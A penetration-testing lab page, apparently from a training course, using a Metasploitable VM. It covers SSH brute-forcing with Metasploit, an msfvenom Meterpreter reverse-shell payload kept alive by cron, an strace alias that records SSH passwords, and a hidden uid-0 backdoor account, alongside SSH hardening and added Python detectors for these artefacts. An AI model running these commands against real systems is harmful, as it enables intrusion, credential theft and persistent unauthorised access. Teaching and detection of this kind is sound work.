1 SSH brute force and security configuration
1.1 Problem
1) SSH brute force
- Use MSF to find the ssh_login brute-force module
- Set the module parameters and attempt to brute-force the SSH login password
2) SSH security configuration
- Port 12345, single-connection duration 1 minute, root login prohibited
- Maximum authentication attempts per connection 2, maximum sessions 4
- Add the whitelisted user kali, allowed to connect only from 192.168.10.1
3) Restart the SSH service and test the effect
1.2 Steps
Implementing this case requires the following steps.
Step 1: SSH brute force
1) Use MSF to find the ssh_login brute-force module.

```
┌──(root@localhost)-[~/桌面]
└─# msfconsole
msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
```

2) Set the module parameters and attempt to brute-force the SSH login password.

```
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.10.143
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
userpass_file => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.10.143:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.10.136:46581 -> 192.168.10.143:22) at 2021-03-25 21:33:28 +0800
[+] 192.168.10.143:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 4 opened (192.168.10.136:36175 -> 192.168.10.143:22) at 2021-03-25 21:47:38 +0800
[+] 192.168.10.143:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (192.168.10.136:34197 -> 192.168.10.143:22) at 2021-03-26 00:09:44 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/ssh/ssh_login) > show sessions
1 shell linux SSH user:user 192.168.10.136:40293 -> 192.168.10.143:22
2 shell linux SSH postgres 192.168.10.136:39071 -> 192.168.10.143:22
msf6 auxiliary(scanner/ssh/ssh_login) > sessions 1
whoami
user
```
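On the target side, a run like the one above leaves a burst of "Failed password" lines in sshd's auth log, followed by "Accepted password" for whichever credential was guessed. The following detector, an added example that is not part of the original lab page, flags that pattern: it groups sshd log lines by source address, looks for a burst of failures inside a sliding window, and reports which accounts were accepted from that source after the guessing started. The log lines in SAMPLE_LOG are constructed to resemble the target's /var/log/auth.log during the lab's ssh_login run; the window and threshold values are assumptions to tune per environment.

```python
"""Flag SSH password brute-forcing in sshd auth-log lines.

Added example, not part of the original lab page. SAMPLE_LOG is constructed
to resemble what the ssh_login run above would leave in the target's
/var/log/auth.log; the window and threshold values are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Standard OpenSSH syslog lines for failed and accepted password logins.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: six guesses in under a minute from the attacking host,
# one of them succeeding, plus an unrelated login from the admin workstation.
SAMPLE_LOG = """\
Mar 25 21:33:01 metasploitable sshd[4410]: Failed password for invalid user admin from 192.168.10.136 port 46501 ssh2
Mar 25 21:33:02 metasploitable sshd[4412]: Failed password for root from 192.168.10.136 port 46503 ssh2
Mar 25 21:33:04 metasploitable sshd[4414]: Failed password for invalid user test from 192.168.10.136 port 46505 ssh2
Mar 25 21:33:06 metasploitable sshd[4416]: Failed password for user from 192.168.10.136 port 46507 ssh2
Mar 25 21:33:09 metasploitable sshd[4418]: Failed password for postgres from 192.168.10.136 port 46509 ssh2
Mar 25 21:33:12 metasploitable sshd[4420]: Failed password for msfadmin from 192.168.10.136 port 46511 ssh2
Mar 25 21:33:28 metasploitable sshd[4430]: Accepted password for user from 192.168.10.136 port 46581 ssh2
Mar 25 21:40:10 metasploitable sshd[4500]: Accepted password for msfadmin from 192.168.10.1 port 50123 ssh2
"""


def parse_auth_lines(lines):
    """Yield (timestamp, result, user, source) for lines matching LINE_RE.
    Syslog timestamps carry no year, so strptime defaults it; only the
    differences between timestamps matter here."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]


def detect_bruteforce(lines, window_s=60, threshold=5):
    """Return {source: summary} for sources with at least `threshold`
    failed logins inside any `window_s`-second span, listing the accounts
    that were accepted from that source after the guessing started."""
    by_src = defaultdict(list)
    for ev in parse_auth_lines(lines):
        by_src[ev[3]].append(ev)

    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e[0])
        fails = [e for e in events if e[1] == "Failed"]
        # Sliding window over the failure timestamps.
        lo, burst = 0, False
        for hi in range(len(fails)):
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        started = fails[0][0]
        accepted = sorted({e[2] for e in events
                           if e[1] == "Accepted" and e[0] >= started})
        alerts[src] = {
            "failures": len(fails),
            "users_tried": len({e[2] for e in fails}),
            "accepted_after_failures": accepted,
        }
    return alerts


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(src, info)
```

Run against the sample, the attacking host is reported with six failures across six accounts and one account accepted afterwards, while the single legitimate login from 192.168.10.1 produces no alert. The "accepted after failures" field is the one worth paging on: a burst of failures alone is noise, a burst followed by success is a likely compromised account.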
Step 2: SSH security configuration
1) Edit the SSH configuration file (the leading numbers are the line positions shown in the editor)

```
┌──(root@localhost)-[~/桌面]
└─# vim /etc/ssh/sshd_config
15 Port 12345
33 LoginGraceTime 1m
34 PermitRootLogin no
36 MaxAuthTries 2
37 MaxSessions 4
AllowUsers kali@192.168.10.1
```

2) Restart the SSH service

```
┌──(root@localhost)-[~/桌面]
└─# systemctl restart ssh
```

2 SSH key-based connection
2.1 Problem
Configure key-pair access to SSH.
- Configure a key pair with MobaXterm
- Transfer the public key to the kali host
- Adjust the kali host's SSH configuration to prohibit password login
2.2 Steps
Configure key-pair access to SSH; implementing this case requires the following steps.
1) Configure a key pair with MobaXterm

```
[Administrator.SC-201908041746] ➤ ssh-keygen
Enter file in which to save the key (/home/mobaxterm/.ssh/id_rsa):   # file name (accept the default)
Enter passphrase (empty for no passphrase):                            # private-key passphrase
Enter same passphrase again:                                           # confirm the passphrase
```

2) Transfer the public key to the kali host

```
ssh-copy-id kali@192.168.10.136
ssh kali@192.168.10.136        # a password is no longer required
cat .ssh/authorized_keys       # view the public key
```

3) Edit the SSH configuration file to prohibit password login

```
┌──(root@localhost)-[~/桌面]
└─# vim /etc/ssh/sshd_config
58 PasswordAuthentication no
# systemctl restart ssh
```
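Both the hardening in section 1 (port, grace time, root login, auth tries, sessions, AllowUsers) and the key-only change just made (PasswordAuthentication no) are easy to get subtly wrong: sshd honours the first occurrence of a keyword, a directive left commented out silently falls back to the default, and a later Match block can undo a global setting for some clients. The checker below is an added example, not code from the lab page: it parses an sshd_config text with those rules and lists every deviation from the required values. SAMPLE_DEFAULT and SAMPLE_HARDENED are constructed config fragments; to check a real host, pass it the contents of /etc/ssh/sshd_config.

```python
"""Check an sshd_config against the hardening required in sections 1 and 2:
port 12345, 1 minute grace time, no root login, 2 auth tries, 4 sessions,
only kali from 192.168.10.1, and no password authentication.

Added example, not from the lab page. The two config texts are constructed;
the directive names and the first-occurrence rule are those of sshd_config(5).
"""

REQUIRED = {
    "port": "12345",
    "logingracetime": "1m",
    "permitrootlogin": "no",
    "maxauthtries": "2",
    "maxsessions": "4",
    "passwordauthentication": "no",
}
REQUIRED_ALLOWUSERS = {"kali@192.168.10.1"}

# Constructed: the stock file, with most directives still commented out.
SAMPLE_DEFAULT = """\
#Port 22
#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#MaxAuthTries 6
PasswordAuthentication yes
"""

# Constructed: the file after the lab's edits.
SAMPLE_HARDENED = """\
Port 12345
LoginGraceTime 1m
PermitRootLogin no
MaxAuthTries 2
MaxSessions 4
AllowUsers kali@192.168.10.1
PasswordAuthentication no
"""


def parse_sshd_config(text):
    """Return (globals, allow_users, match_overrides).

    globals: {lowercase keyword: value} keeping the FIRST occurrence, which
    is the one sshd honours. AllowUsers lines accumulate into a set.
    Directives inside a Match block are returned separately, because they
    apply conditionally and can silently undo a global setting."""
    globals_, allow_users, overrides = {}, set(), []
    match_cond = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            match_cond = value
            continue
        if match_cond is not None:
            overrides.append((match_cond, key, value))
        elif key == "allowusers":
            allow_users.update(value.split())
        else:
            globals_.setdefault(key, value)
    return globals_, allow_users, overrides


def check_hardening(text):
    """Return a list of findings; an empty list means the config complies."""
    cfg, allow, overrides = parse_sshd_config(text)
    findings = []
    for key, want in REQUIRED.items():
        got = cfg.get(key)
        if got is None:
            findings.append(f"{key}: not set, sshd default applies (want {want})")
        elif got.lower() != want:
            findings.append(f"{key}: is {got}, want {want}")
    if not allow:
        findings.append("allowusers: not set, every account may log in")
    elif allow != REQUIRED_ALLOWUSERS:
        findings.append(f"allowusers: is {sorted(allow)}, want {sorted(REQUIRED_ALLOWUSERS)}")
    for cond, key, value in overrides:
        if key in REQUIRED and value.lower() != REQUIRED[key]:
            findings.append(f"Match {cond}: {key} {value} overrides the global setting")
    return findings


if __name__ == "__main__":
    for name, text in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED)):
        print(name, check_hardening(text) or "OK")
```

After editing, `sshd -t` validates the syntax and `sshd -T` prints the effective configuration; running this checker over the output of `sshd -T` (which prints directives in lower case, one per line) catches the cases where the file looks right but an earlier line or an Include wins.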
3 Msfvenom backdoor exercise
3.1 Problem
1) Msfvenom backdoor exercise
- Create a backdoor payload
- Upload the payload to the target host's /tmp directory
- Run the payload on the target host via a scheduled task
- Run the handler in MSF to accept the backdoor connection
2) Use a Linux cron job to run the payload automatically
- Create a cron job on the target host
- Check the MSF session
3) Create a backdoor using sshd
- Create a link to sshd in the /tmp directory, listening on port 5555
- Connect with ssh
4) Use an SSH keylogger to record SSH input
- Create an ssh command alias
- Record the SSH connection password
- Create a backdoor administrator user
3.2 Steps
Msfvenom backdoor generation; implementing this case requires the following steps.
1) List the Linux payloads included in msfvenom

```
┌──(root@localhost)-[~/桌面]
└─# msfvenom -l all | grep linux | grep x86 | grep tcp
linux/x86/meterpreter/bind_ipv6_tcp         Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid    Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp         Inject the mettle server payload (staged). Listen for a connection
linux/x86/meterpreter/bind_tcp              Inject the mettle server payload (staged). Listen for a connection (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid         Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/meterpreter/reverse_ipv6_tcp      Inject the mettle server payload (staged). Connect back to attacker over IPv6
linux/x86/meterpreter/reverse_nonx_tcp      Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp           Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp_uuid      Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter_reverse_tcp           Run the Meterpreter / Mettle server payload (stageless)
linux/x86/metsvc_bind_tcp                   Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp                Stub payload for interacting with a Meterpreter Service
linux/x86/shell/bind_ipv6_tcp               Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid          Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp               Spawn a command shell (staged). Listen for a connection
linux/x86/shell/bind_tcp                    Spawn a command shell (staged). Listen for a connection (Linux x86)
linux/x86/shell/bind_tcp_uuid               Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/shell/reverse_ipv6_tcp            Spawn a command shell (staged). Connect back to attacker over IPv6
linux/x86/shell/reverse_nonx_tcp            Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                 Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid            Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp               Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                    Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port        Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_reverse_tcp                 Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp_ipv6            Connect back to attacker and spawn a command shell over IPv6
```

2) Create the backdoor payload

```
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.136 lport=4444 -f elf -o shell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell
```

3) Upload the payload to the target host's /tmp directory

```
┌──(root@localhost)-[~/桌面]
└─# scp shell msfadmin@192.168.10.143:/tmp
msfadmin@192.168.10.143's password:
shell                                         100%  207   500.5KB/s   00:00
```

4) Run the payload on the target host

```
┌──(root@localhost)-[~/桌面]
└─# ssh msfadmin@192.168.10.143
msfadmin@192.168.10.143's password: msfadmin

msfadmin@metasploitable:~$ ls /tmp/
5156.jsvc_up  open.txt  shell  time.txt
msfadmin@metasploitable:~$ chmod +x /tmp/shell
msfadmin@metasploitable:~$ /tmp/shell &
```

5) Run the handler in MSF to accept the backdoor connection

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.10.136
lhost => 192.168.10.136
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.136:4444
[*] Sending stage (980808 bytes) to 192.168.10.143
[*] Meterpreter session 4 opened (192.168.10.136:4444 -> 192.168.10.143:36195) at 2021-04-25 16:16:16 +0800

meterpreter > getuid
Server username: msfadmin @ metasploitable (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > shell
Process 8287 created.
Channel 1 created.
whoami
msfadmin
```

Step 2: Use a Linux cron job to run the payload automatically
1) Create the cron job on the target host.

```
msfadmin@metasploitable:~$ EDITOR=vi crontab -e
* * * * * /tmp/shell
```

2) Check the MSF session.

```
meterpreter > background
msf6 exploit(multi/handler) > sessions
10 meterpreter x86/linux msfadmin @ metasploitable
   (uid=1000, gid=1000, euid=1000, egid=1000) @ metasp...
   192.168.10.136:4444 -> 192.168.10.143:59702 (192.168.10.143)
```
4 SSH keylogger
4.1 Problem
1) Use an SSH keylogger to record SSH input
- Create an ssh command alias
- Record the SSH connection password
2) Create a backdoor administrator user
4.2 Steps
Use an SSH keylogger to record SSH input; implementing this case requires the following steps.
Step 1: Create the ssh command alias

```
msfadmin@metasploitable:~$ vi .bashrc
# add one line
alias ssh="strace -o /tmp/sshpwd-$(date '+%F-%s').log -e read,write,connect -s2048 ssh"
msfadmin@metasploitable:~$ source .bashrc
```

Step 2: Use SSH to connect to the local root account and capture the ssh input

```
root@metasploitable:~# ssh msfadmin@127.0.0.1
msfadmin@127.0.0.1's password: msfadmin

root@metasploitable:~# ls /tmp/
jsvc_up  sshpwd-29Mar031617026026.log

msfadmin@metasploitable:~$ cat -n /tmp/sshpwd-25Apr041619343426.log
    88  write(4, "root@192.168.10.143's password: ", 32) = 32
    89  read(4, "1", 1) = 1
    90  read(4, "2", 1) = 1
    91  read(4, "3", 1) = 1
    92  read(4, "4", 1) = 1
    93  read(4, "5", 1) = 1
    94  read(4, "6", 1) = 1
    95  read(4, "\n", 1) = 1
    96  write(4, "\n", 1) = 1
```

Step 3: Create the backdoor administrator user backdoor
useradd: -u sets the uid, -g sets the gid, -o allows a duplicate id, -d sets the home directory

```
root@metasploitable:~# useradd -u 0 -g 0 -d /root -o backdoor
root@metasploitable:~# echo "backdoor:123456" | chpasswd
root@metasploitable:~# su - backdoor
root@metasploitable:~# whoami
root
root@metasploitable:~# id backdoor
uid=0(root) gid=0(root) groups=0(root)
```
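Sections 3 and 4 leave three artefacts on the host that an administrator can look for directly: a crontab entry whose command lives in /tmp (the every-minute `/tmp/shell` job), an `alias ssh=` in a user's shell startup file that runs something other than ssh (the strace wrapper), and a second uid-0 entry in /etc/passwd (the `backdoor` account). The audit below is an added example, not code from the lab page; the three sample texts are constructed to mirror the lab's artefacts, `audit_text()` works on strings so it runs offline, and `audit_files()` reads real files (its default path for /etc/passwd is the conventional one; the crontab and .bashrc paths are whatever the host uses).

```python
"""Audit a Linux host for the persistence artefacts shown in sections 3 and 4:
a cron entry that executes from /tmp, a shell alias that wraps ssh in another
program, and a second uid-0 account in /etc/passwd.

Added example, not part of the lab page. The three sample texts are
constructed to mirror the lab's artefacts.
"""
import re
import shlex

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/shell
"""

SAMPLE_BASHRC = """\
alias ll='ls -l'
alias ssh="strace -o /tmp/sshpwd-$(date '+%F-%s').log -e read,write,connect -s2048 ssh"
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin:/home/msfadmin:/bin/bash
backdoor:x:0:0::/root:/bin/sh
"""

# Directories any local user can write to; a scheduled command living here
# is under the control of whoever planted it.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
ALIAS_RE = re.compile(r"^\s*alias\s+ssh=(.*)$")


def cron_entries_in_tmp(text):
    """Return crontab lines whose command references a world-writable directory."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)          # five schedule fields + command
        if len(fields) < 6:
            continue
        try:
            tokens = shlex.split(fields[5])
        except ValueError:                    # unbalanced quotes: fall back
            tokens = fields[5].split()
        if any(tok.startswith(WORLD_WRITABLE_DIRS) for tok in tokens):
            hits.append(line)
    return hits


def ssh_alias_wrappers(text):
    """Return the program an `alias ssh=...` line really runs, when it is not ssh."""
    wrappers = []
    for line in text.splitlines():
        m = ALIAS_RE.match(line)
        if not m:
            continue
        target = m.group(1).strip().strip("\"'").split()
        if target and target[0] != "ssh":
            wrappers.append(target[0])
    return wrappers


def extra_uid0_accounts(text):
    """Return account names other than root whose uid is 0."""
    names = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def audit_text(crontab, bashrc, passwd):
    return {
        "cron": cron_entries_in_tmp(crontab),
        "ssh_alias": ssh_alias_wrappers(bashrc),
        "uid0": extra_uid0_accounts(passwd),
    }


def audit_files(crontab_path, bashrc_path, passwd_path="/etc/passwd"):
    """Same checks against real files; per-user crontabs normally live under
    /var/spool/cron/crontabs/<user> and need root to read."""
    with open(crontab_path) as c, open(bashrc_path) as b, open(passwd_path) as p:
        return audit_text(c.read(), b.read(), p.read())


if __name__ == "__main__":
    print(audit_text(SAMPLE_CRONTAB, SAMPLE_BASHRC, SAMPLE_PASSWD))
```

On the sample inputs the audit reports the `/tmp/shell` cron line, `strace` as the program hiding behind the ssh alias, and `backdoor` as an extra uid-0 account. The alias check deliberately ignores `alias ssh='ssh -A'`-style conveniences, since the first word is still ssh; the uid-0 check is the same test `awk -F: '$3 == 0' /etc/passwd` performs, kept in Python here so all three checks share one report.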
5 SUID permission
5.1 Problem
1) Observe the effect without SUID permission
- Copy the cp command to mycp
- Use the mycp command to copy /etc/passwd to the current directory
- Check the file permissions of passwd in the current directory
2) Observe the effect with SUID permission
- Grant the s permission to mycp
- Use mycp to copy /etc/passwd to the current directory (renamed passwd-new)
- Check the file permissions again
5.2 Steps
Implementing this case requires the following steps.
Step 1: Observe the effect without SUID permission
1) Copy the cp command to mycp and check the file permissions

```
┌──(root@localhost)-[~/桌面]
└─# cp /usr/bin/cp /usr/bin/mycp

┌──(root@localhost)-[~/桌面]
└─# ls -l /usr/bin/mycp
-rwxr-xr-x 1 root root 151168 4月 19 03:18 /usr/bin/mycp
```

2) Switch to the kali user and copy a file with mycp

```
┌──(root@localhost)-[~/桌面]
└─# su - kali

┌──(root@localhost)-[~/桌面]
└─# mycp /etc/passwd passwd
```

3) Check the file owner

```
┌──(root@localhost)-[~/桌面]
└─# ls -l passwd
-rw-r--r-- 1 kali kali 3143 4月 19 03:18 passwd
```

Step 2: Observe the effect with SUID permission
1) Grant the s permission to mycp

```
┌──(root@localhost)-[~/桌面]
└─# chmod u+s /usr/bin/mycp

┌──(root@localhost)-[~/桌面]
└─# ls -l /usr/bin/mycp
-rwsr-xr-x 1 root root 151168 4月 19 03:18 /usr/bin/mycp
```

2) Switch to the kali user and copy a file with mycp

```
┌──(root@localhost)-[~/桌面]
└─# su - kali

┌──(root@localhost)-[~/桌面]
└─# mycp /etc/passwd passwd-new
```

3) Check the file owner

```
┌──(root@localhost)-[~/桌面]
└─# ls -l passwd-new
-rw-r--r-- 1 root kali 3143 4月 19 03:18 passwd
```
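The difference between the two runs is the single `s` in the owner-execute slot of the mode string: with it set, the kernel gives the process the file owner's uid (root) rather than the caller's (kali), which is why passwd-new comes out owned by root. The following added example, not code from the lab page, reads that bit both ways the lab shows it, from an `ls -l` mode string and from the numeric `st_mode` that `stat` returns, and walks a directory for set-uid regular files, which is the check an administrator runs after an exercise like this to make sure no stray `mycp` was left behind. The mode strings are the ones from the lab's own output; the directory walk takes any root path.

```python
"""Read the set-uid bit the two ways the lab shows it: from an ls -l mode
string and from the numeric st_mode that stat returns, then walk a directory
for set-uid regular files.

Added example, not from the lab page. The mode strings come from the lab's
own ls -l output; the directory walk is illustrative and takes any root.
"""
import os
import stat

# ls -l prints three rwx triplets after the type character. The execute slot
# of each triplet doubles as the flag position: s/S in the owner slot is
# setuid, s/S in the group slot is setgid, t/T in the other slot is sticky.
# Upper case means the flag is set but the execute bit itself is not.


def mode_string_to_int(mode_str):
    """Convert e.g. '-rwsr-xr-x' to 0o4755 (permission bits only)."""
    if len(mode_str) != 10:
        raise ValueError(f"expected a 10-character ls -l mode string, got {mode_str!r}")
    perms = mode_str[1:]
    mode = 0
    for i, ch in enumerate(perms):
        bit = 1 << (8 - i)          # rwxrwxrwx maps to bits 8 down to 0
        if ch in "rwxst":           # lower-case s/t also imply execute
            mode |= bit
    if perms[2] in "sS":
        mode |= stat.S_ISUID
    if perms[5] in "sS":
        mode |= stat.S_ISGID
    if perms[8] in "tT":
        mode |= stat.S_ISVTX
    return mode


def is_setuid(mode):
    """True when the setuid bit is set in a numeric st_mode."""
    return bool(mode & stat.S_ISUID)


def effective_user(mode_str, owner, caller):
    """The effective uid a process gets when it runs this file: the file's
    owner if it is setuid, otherwise the caller. This is what makes the
    lab's passwd-new come out owned by root."""
    return owner if is_setuid(mode_string_to_int(mode_str)) else caller


def find_setuid(root):
    """Return paths of regular files under root that carry the setuid bit.
    lstat is used so symlinks are not followed; unreadable entries are skipped."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    for s in ("-rwxr-xr-x", "-rwsr-xr-x"):
        print(s, oct(mode_string_to_int(s)), "runs as", effective_user(s, "root", "kali"))
    print(find_setuid("/usr/bin"))
```

`find_setuid("/usr/bin")` is the Python form of `find /usr/bin -perm -4000 -type f`; comparing its output against a known-good baseline is the quickest way to spot a copied-and-setuid `cp` like the lab's `mycp`, which has no business being there after the exercise ends.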
https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY04/CASE/01/index.html